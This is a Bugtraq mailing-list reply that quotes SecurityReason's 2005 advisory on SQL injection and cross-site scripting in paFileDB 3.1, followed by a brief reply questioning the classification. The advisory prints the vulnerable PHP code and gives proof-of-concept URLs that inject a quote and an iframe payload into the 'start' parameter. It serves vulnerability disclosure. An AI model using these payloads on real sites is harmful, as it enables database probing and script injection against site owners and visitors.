<<< Date Index >>>     <<< Thread Index >>>

Not SQL injection and XSS in paFileDB?



In-Reply-To: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx>

>Received: (qmail 27749 invoked from network); 12 Mar 2005 19:45:27 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) 
>(205.206.231.26)
>  by mail.securityfocus.com with SMTP; 12 Mar 2005 19:45:27 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com 
>[205.206.231.20])
>       by outgoing2.securityfocus.com (Postfix) with QMQP
>       id 6C68014544F; Sat, 12 Mar 2005 12:52:18 -0700 (MST)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 32145 invoked from network); 12 Mar 2005 04:00:48 -0000
>Date: 12 Mar 2005 18:24:42 -0000
>Message-ID: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: SecurityReason <sp3x@xxxxxxxxxxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: [SECURITYREASON.COM]  SQL injection and XSS in paFileDB
>
>
>
>-=[ SecurityReason-2005-SRA#03 ]=-
>
>-=[ SQL injection and XSS in paFileDB ]=-
>
>Author: sp3x
>Date: 12 March 2005
>
>Affected software :
>===================
>paFileDB version : =>3.1
>
>Description :
>=============
>
>paFileDB is designed to allow webmasters have a database of files for download 
>on their site. 
>To add a download, all you do is upload the file using FTP or whatever method 
>you use, log
>into paFileDB's admin center, and fill out a form to add a file. paFileDB lets 
>you edit and
>delete the files too. 
>No more messing with a bunch of HTML pages for a file database on your site! 
>Using speedy MySQL for storing data, and powerful PHP for processing 
>everything, paFileDB is
>one of the best and easiest ways to manage files!
>
>SQL injection:
>=======================
>
>/includes/viewall.php
>/includes/category.php
>
>Code:
>-------------------------------------------------------------------------------------------------
>if ($sortby == "name") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files 
> WHERE file_pin = '0' ORDER BY file_name 
>
>ASC LIMIT $start,20", 0);
>}
>if ($sortby == "date") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files 
> WHERE file_pin = '0' ORDER BY file_time 
>
>DESC LIMIT $start,20", 0);
>}
>if ($sortby == "downloads") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files 
> WHERE file_pin = '0' ORDER BY file_dls 
>
>DESC LIMIT $start,20", 0);
>}
>if ($sortby == "rating") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files 
> WHERE file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
>}
>--------------------------------------------------------------------------------------------------
>
>As we can see the $start variable is vuln for sql injection attack.
>But this sql injection for now is not critical , why ? because if we want to 
>inject malicious code to sql sentence 
>
>after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can 
>do, is to fail the sql request. No 
>
>UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION 
>and ORDER BY Error number: 1221" so we 
>
>must wait When Mysql version 4.1 will be widely used then we can have 
>something like this - "ORDER BY desc ASC LIMIT 
>
>(SELECT our_table FROM pafiledb_admin)...".
>
>Examples:
>=========
>
>Sql injection:
>--------------
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '\',20' 
>at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE 
>file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT \',20
>
>Also in this error message we can see the [prefix] pafiledb tables that should 
>be hidden :) 
>And we can insert XSS code in error message for example :
>
>Cros Site Scripting (XSS):
>--------------------------
>
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=";><iframe%20src=http://www.securityreason.com></iframe
>
>>&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=";><iframe%20src=http://www.securityreason.com></ifram
>
>e>&sortby=date
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '[Our 
>XSS]',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE 
>file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20
>
>How to fix :
>============
>
>Download the new version of the script or update.
>
>Vendor :
>========
>
>No respond
>
>
>Greetz :
>========
>
>Special greetz : cXIb8O3 , pkw :]
>
>Contact :
>=========
>
>sp3x[at]securityreason[dot].com
>www.securityreason.com
>
Dear sp3x 

are you sure this is SQL injection or XSS ?

i do not think it's SQL injection becuse u use XSS Vuln in your Bug 

i hope you read more info about SQL injection